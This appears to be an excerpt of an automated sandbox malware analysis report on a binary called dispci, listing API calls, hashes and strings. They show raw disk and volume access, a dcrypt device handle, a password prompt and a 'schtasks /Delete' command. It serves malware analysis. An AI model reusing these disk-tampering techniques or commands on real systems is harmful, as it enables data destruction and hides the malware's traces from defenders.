                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                              • String ID:
                                              • API String ID: 938513278-0
                                              • Opcode ID: 0786d4b998d87ce564b3a10c8d4c5cd7c72ac679ba83fc78716c828d577a7197
                                              • Instruction ID: aee61542c3cf4895020cacd284e90055673870ae62aa7c249f17c3739c48320a
                                              • Opcode Fuzzy Hash: 0786d4b998d87ce564b3a10c8d4c5cd7c72ac679ba83fc78716c828d577a7197
                                              • Instruction Fuzzy Hash: C1F0E932E44B109BDB21FBB89A0376F7BA06F00724F29454AF541A72D2DF784841CB96
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000040), ref: 00A850CC
                                                • Part of subcall function 00A82020: TlsGetValue.KERNEL32(?), ref: 00A8202B
                                                • Part of subcall function 00A82020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82043
                                              • VirtualLock.KERNEL32(?,00000104), ref: 00A850FD
                                              • _wprintf.LIBCMT ref: 00A8511B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocCreateFileLockValue_wprintf
                                              • String ID: Enter password#1:
                                              • API String ID: 1727537069-3500599354
                                              • Opcode ID: 8f4fb33a6382139c1cfc46b04cfb21a8259673cdc740dfd45eb140b8f5a7d27a
                                              • Instruction ID: 51330bc2127710fbce5880710a240ec00b66999dac1e8784b2f1d10132c3d523
                                              • Opcode Fuzzy Hash: 8f4fb33a6382139c1cfc46b04cfb21a8259673cdc740dfd45eb140b8f5a7d27a
                                              • Instruction Fuzzy Hash: 6C01A7B1F9071577EE21B7F46D47B9E76689B14B24F0001A5FE05A62C1EEB19A4083D2
                                              APIs
                                                • Part of subcall function 00A839E0: __snwprintf.LIBCMT ref: 00A83A0A
                                                • Part of subcall function 00A839E0: _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A839E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                                • Part of subcall function 00A839E0: _free.LIBCMT ref: 00A83AD6
                                              • _malloc.LIBCMT ref: 00A83191
                                              • CloseHandle.KERNEL32 ref: 00A8329D
                                              • _free.LIBCMT ref: 00A832A4
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _free_malloc$CloseCreateFileHandle__snwprintf
                                              • String ID:
                                              • API String ID: 496446412-0
                                              • Opcode ID: 3843d203f5d21d9dee5ac1ac1f52a5e570dc2ec360b0b9f417b14dc1046213d2
                                              • Instruction ID: 9ed247c326aac6811bc108fcee9eaecd4c64b38a3bab24deb4c01c2b526b2eb8
                                              • Opcode Fuzzy Hash: 3843d203f5d21d9dee5ac1ac1f52a5e570dc2ec360b0b9f417b14dc1046213d2
                                              • Instruction Fuzzy Hash: 784115B2D001188BDF20FB54CC84AEA73B9FB84750F1541E9ED0A5B201EA35AF458BA1
                                              APIs
                                                • Part of subcall function 00A835D0: _memset.LIBCMT ref: 00A835FA
                                                • Part of subcall function 00A835D0: CreateFileW.KERNEL32(\\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1),80100000,00000003,00000000,00000003,00000000,00000000,?,?,00A82DD3), ref: 00A83616
                                              • _malloc.LIBCMT ref: 00A8305B
                                              • _free.LIBCMT ref: 00A830DE
                                              • CloseHandle.KERNEL32 ref: 00A830EF
                                              • _free.LIBCMT ref: 00A830F6
                                                • Part of subcall function 00A83AF0: __aullrem.LIBCMT ref: 00A83B0A
                                                • Part of subcall function 00A83AF0: _memmove.LIBCMT ref: 00A83BBC
                                                • Part of subcall function 00A83AF0: _free.LIBCMT ref: 00A83BC5
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _free$CloseCreateFileHandle__aullrem_malloc_memmove_memset
                                              • String ID:
                                              • API String ID: 3971761140-0
                                              • Opcode ID: b83f8eb7ce2421a502e26a075d26c9a2ca226a6999101e04e527486da355b24e
                                              • Instruction ID: a55f412b3694530965e1fe9770ae472e46198198bcecd93fe4e52ede996e8cca
                                              • Opcode Fuzzy Hash: b83f8eb7ce2421a502e26a075d26c9a2ca226a6999101e04e527486da355b24e
                                              • Instruction Fuzzy Hash: 2031C377E001189BDF20BB64DD419EEB3B4EF44B60F0402A9EC1A97241EA359F51CB91
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A8A6C2
                                              • __isleadbyte_l.LIBCMT ref: 00A8A6F5
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00A8A726
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00A8A794
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 2a96c4dcb2594c1ab50cda2d2fa6bd4857d804135a1a9773fbbd0715b155b8d5
                                              • Instruction ID: 31dd824bc5679c8ed02065d4ea3fb91999595fa62c09daa6e941977d724363df
                                              • Opcode Fuzzy Hash: 2a96c4dcb2594c1ab50cda2d2fa6bd4857d804135a1a9773fbbd0715b155b8d5
                                              • Instruction Fuzzy Hash: 2D31C032A00255EFEB20EF64CC819AE3BB5BF11310B18857AE4659B195E730DD41EB52
                                              APIs
                                              • FindFirstVolumeW.KERNEL32(?,00000104), ref: 00A84802
                                                • Part of subcall function 00A820A0: TlsGetValue.KERNEL32(?), ref: 00A820BD
                                                • Part of subcall function 00A820A0: _wcschr.LIBCMT ref: 00A820C8
                                                • Part of subcall function 00A820A0: _wcschr.LIBCMT ref: 00A820F8
                                                • Part of subcall function 00A820A0: __snwprintf.LIBCMT ref: 00A8210C
                                                • Part of subcall function 00A820A0: DeviceIoControl.KERNEL32(00000000,00220040,?,00000298,?,00000298,?,00000000), ref: 00A8213D
                                                • Part of subcall function 00A820A0: DeviceIoControl.KERNEL32(00000000,0022001C,?,00000298,?,0000022C,?,00000000), ref: 00A82196
                                              • FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00A84889
                                              • GetLastError.KERNEL32 ref: 00A8488B
                                                • Part of subcall function 00A822B0: FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00A822D6
                                                • Part of subcall function 00A822B0: GetLastError.KERNEL32(?,?,00000104), ref: 00A822DC
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: FindVolume$ControlDeviceErrorLastNext_wcschr$FirstValue__snwprintf
                                              • String ID:
                                              • API String ID: 940178688-0
                                              • Opcode ID: a385db34a4a005aadcc88bc5f72cd783474fa10d5dabeacbfb1f1a2834c60f25
                                              • Instruction ID: 8671bbbc130ed29d398d1f7f5f2f4daf329ad79ca415ce08c448a190097c86a6
                                              • Opcode Fuzzy Hash: a385db34a4a005aadcc88bc5f72cd783474fa10d5dabeacbfb1f1a2834c60f25
                                              • Instruction Fuzzy Hash: 6821B372B002089BDF20FB65ED85ABE73B5FB88311F5505ADE91A97190EE309E45CF90
                                              APIs
                                              • GetFileSizeEx.KERNEL32(?,?), ref: 00A81723
                                              • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00A81744
                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00A8175D
                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,?), ref: 00A81779
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$AllocLocalPointerReadSize
                                              • String ID:
                                              • API String ID: 3779513235-0
                                              • Opcode ID: 35069fb18431dd21c2982b413a004c5b7d519f3775b40922115feafd1399ce6b
                                              • Instruction ID: ffd59f7d732d5099b15f7d627702f1e035e34fb86e46a004dcb9d05899074422
                                              • Opcode Fuzzy Hash: 35069fb18431dd21c2982b413a004c5b7d519f3775b40922115feafd1399ce6b
                                              • Instruction Fuzzy Hash: B9112175A00219AFDF10EBA58C49BBFB7BCEB04710F204959A959E3240EB749A158F50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                              • Instruction ID: 1ecc06126e7c676ec84c842ecdcf15b2b25298133c5c73db476f03047be2a898
                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                              • Instruction Fuzzy Hash: EE110E7240018ABFCF266F84DC41CEE3F66BB19394B598425FE1859131D736C9B1AB81
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32(00000000,00A866A9), ref: 00A8ADA1
                                              • __malloc_crt.LIBCMT ref: 00A8ADD0
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A8ADDD
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: EnvironmentStrings$Free__malloc_crt
                                              • String ID:
                                              • API String ID: 237123855-0
                                              • Opcode ID: 369c9ddee4040b3de23e6aedeb71b59f9f72306a1ac1dbf46804320add5fa267
                                              • Instruction ID: 17d06a226e5036f4692b9634af12a1bd8324494857167d576d328275be1f59a9
                                              • Opcode Fuzzy Hash: 369c9ddee4040b3de23e6aedeb71b59f9f72306a1ac1dbf46804320add5fa267
                                              • Instruction Fuzzy Hash: CEF0A77B5054106BEF31B774BC499AB6778DEF236231A8517F801C3610FA208E4787B2
                                              APIs
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              • CreateThread.KERNEL32(00000000,00000000,00A85A50,00000000,00000000,00000000), ref: 00A85BD8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Create$DirectoryEnvironmentProcessSystemThreadVariable_vswprintf_slstrcat
                                              • String ID: drogon$schtasks /Delete /F /TN %ws
                                              • API String ID: 2360524982-1803547564
                                              • Opcode ID: 5a16323f58ef87ba026267723a200ba3c42c1c8de80b554c10b3aef3b3c601ad
                                              • Instruction ID: 764a991926f38107854f3834e94d4e569304da6fa8a22e2e9d826f006776ba3c
                                              • Opcode Fuzzy Hash: 5a16323f58ef87ba026267723a200ba3c42c1c8de80b554c10b3aef3b3c601ad
                                              • Instruction Fuzzy Hash: 57F09BB0F8170CB7EB10FBB49D87F797364E700B00FA00665BA066A2C2DDB06D084785